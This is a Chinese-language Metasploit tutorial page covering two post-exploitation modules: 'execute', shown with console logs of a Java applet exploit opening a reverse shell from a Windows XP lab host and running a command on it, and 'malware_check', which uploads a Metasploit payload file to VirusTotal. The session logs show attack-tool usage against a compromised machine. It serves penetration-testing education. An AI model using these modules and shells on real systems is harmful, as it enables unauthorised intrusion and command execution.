Metasploit Multiple OS Post后期开发:一般模块

execute

该模块将执行任意命令以打开会话。 适用于Windows,Linux,OSX和Unix平台。

msf  post(execute) > 
[*] 10.10.0.100      java_jre17_exec - Java 7 Applet Remote Code Execution handling request
[*] Sending stage (2976 bytes) to 10.10.0.100
[*] Command shell session 1 opened (10.10.0.151:4444 -> 10.10.0.100:1173) at 2012-08-31 15:06:06 -0400

msf  post(execute) > show options

Module options (post/multi/general/execute):

   Name     Current Setting       Required  Description
   ----     ---------------       --------  -----------
   COMMAND  echo hell > file.txt  no        The entire command line to execute on the session
   SESSION  1                     yes       The session to run this module on.

msf  post(execute) > run

[*] Executing echo hell > file.txt on #>Session:shell 10.10.0.100:1173 (10.10.0.100) "Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\administrator\Desktop>">...
[*] Response: 
[*] Post module execution completed

msf  post(execute) >  sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\administrator\Desktop> dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 2CB7-2817

 Directory of C:\Documents and Settings\administrator\Desktop

08/31/2012  09:04 AM    >DIR>          .
08/31/2012  09:04 AM    >DIR>          ..
08/31/2012  09:04 AM                46 file.txt
12/29/2011  03:52 PM                70 portlist.txt
               2 File(s)          1,431 bytes
               2 Dir(s)   4,899,721,216 bytes free

C:\Documents and Settings\administrator\Desktop>

 

malware_check

该模块将文件上传到virustotal.com,并显示扫描结果。 它也可以在meterpreter会话中直接运行。 适用于Windows,Linux,OSX和Unix平台。

msf post(check_malware) > show options

Module options (post/multi/gather/check_malware):

   Name        Current Setting      Required  Description
   ----        ---------------      --------  -----------
   APIKEY                           yes       VirusTotal API key
   REMOTEFILE  C:\msfrev.exe        yes       A file to check from the remote machine
   SESSION     1                    yes       The session to run this module on.

 

msf post(check_malware) > run

[*] 192.168.101.129 - Checking: C:\\msfrev.exe...
[*] 192.168.101.129 - VirusTotal message: Scan finished, information embedded
[*] 192.168.101.129 - MD5: 88b90ef2641ed89aa9506264a46df29a
[*] 192.168.101.129 - SHA1: 9767f651321c5cac786312f59a1c046ac1e27ad3
[*] 192.168.101.129 - SHA256: 04fb3ba1ccb64371f75b0b54d1dc7f20dcef2c6f773d7682b3d7f57d4691d296
[*] Analysis Report: C:\msfrev.exe (38 / 55): 

=====================================================================================================================================

 Antivirus             Detected  Version        Result                           Update
 ---------             --------  -------        ------                           ------
 ALYac                 true      1.0.1.5        Gen:Variant.Zusy.Elzob.8031      20151125
 AVG                   true      16.0.0.4460    Agent                            20151125
 AVware                true      1.5.0.21       Trojan.Win32.Swrort.B (v)        20151124
 Ad-Aware              true      12.0.163.0     Gen:Variant.Zusy.Elzob.8031      20151125
 AegisLab              false     1.5                                             20151125
 Agnitum               true      5.5.1.3        Trojan.Rosena.Gen.1              20151124
 AhnLab-V3             true      2015.11.26.00  Trojan/Win32.Shell               20151125
 Alibaba               false     1.0                                             20151125
 Arcabit               true      1.0.0.624      Trojan.Zusy.Elzob.D1F5F          20151125
 Avast                 true      8.0.1489.320   Win32:SwPatch [Wrm]              20151125
 Avira                 true      8.3.2.4        TR/Crypt.EPACK.Gen2              20151125
 Baidu-International   true      3.5.1.41473    Trojan.Win32.Rozena.AM           20151124
 BitDefender           true      7.2            Gen:Variant.Zusy.Elzob.8031      20151125
 Bkav                  false     1.3.0.7383                                      20151125
 ByteHero              false     1.0.0.1                                         20151125
 CAT-QuickHeal         true      14.00          Trojan.Swrort.A                  20151125
 CMC                   false     1.1.0.977                                       20151124
 ClamAV                true      0.98.5.0       Win.Trojan.MSShellcode-7         20151125
 Comodo                true      23654          TrojWare.Win32.Rozena.A          20151125
 Cyren                 true      5.4.16.7       W32/Swrort.A                     20151125
 DrWeb                 true      7.0.16.10090   Trojan.Swrort.1                  20151125
 ESET-NOD32            true      12622          a variant of Win32/Rozena.AM     20151125
 Emsisoft              true      3.5.0.642      Gen:Variant.Zusy.Elzob.8031 (B)  20151125
 F-Prot                true      4.7.1.166      W32/Swrort.A                     20151125
 F-Secure              true      11.0.19100.45  Gen:Variant.Zusy.Elzob.8031      20151125
 Fortinet              true      5.1.220.0      W32/Swrort.C!tr                  20151125
 GData                 true      25             Gen:Variant.Zusy.Elzob.8031      20151125
 Ikarus                true      T3.1.9.5.0     Trojan.Win32.Swrort              20151125
 Jiangmin              false     16.0.100                                        20151124
 K7AntiVirus           true      9.212.17966    Backdoor ( 04c53cce1 )           20151125
 K7GW                  true      9.212.17968    Backdoor ( 04c53cce1 )           20151125
 Kaspersky             true      15.0.1.10      HEUR:Trojan.Win32.Generic        20151125
 Malwarebytes          true      2.1.1.1115     Backdoor.Bot.Gen                 20151125
...snip...

[*] Post module execution completed

 

meterpreter > run post/multi/gather/check_malware REMOTEFILE=C:\\msfrev.exe

[*] 192.168.101.129 - Checking: C:\Users\loneferret\Downloads\msfrev.exe...
[*] 192.168.101.129 - VirusTotal message: Scan finished, information embedded
[*] 192.168.101.129 - MD5: 88b90ef2641ed89aa9506264a46df29a
[*] 192.168.101.129 - SHA1: 9767f651321c5cac786312f59a1c046ac1e27ad3
[*] 192.168.101.129 - SHA256: 04fb3ba1ccb64371f75b0b54d1dc7f20dcef2c6f773d7682b3d7f57d4691d296
[*] Analysis Report: C:\\msfrev.exe (35 / 54):

=====================================================================================================================================

 Antivirus             Detected  Version        Result                         Update
 ---------             --------  -------        ------                         ------
 ALYac                 true      1.0.1.5        Gen:Variant.Zusy.Elzob.8031    20151125
 AVG                   true      16.0.0.4460    Agent                          20151125
 AVware                true      1.5.0.21       Trojan.Win32.Swrort.B (v)      20151124
 Ad-Aware              true      12.0.163.0     Gen:Variant.Zusy.Elzob.8031    20151125
 AegisLab              false     1.5                                           20151125
 Agnitum               true      5.5.1.3        Trojan.Rosena.Gen.1            20151124
..snip..

 

Metasploit 教程

    A+
发布日期:2018年06月12日 21:37:29  所属分类:Metasploit
最后更新时间:2018-06-12 21:39:19
付杰
Laravel+Elastic全文搜索 实战
  • ¥ 169.0元
  • 市场价:299.0元
购买
详情
React.JS框架经典教程
  • ¥ 98.0元
  • 市场价:198.0元
购买
详情
52ABP ASP.NET Core与Angular开发教程
  • ¥ 398.0元
  • 市场价:598.0元
购买
详情
Kubernetes/K8S企业运维入门进阶实战
  • ¥ 298.0元
  • 市场价:498.0元
购买
详情

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: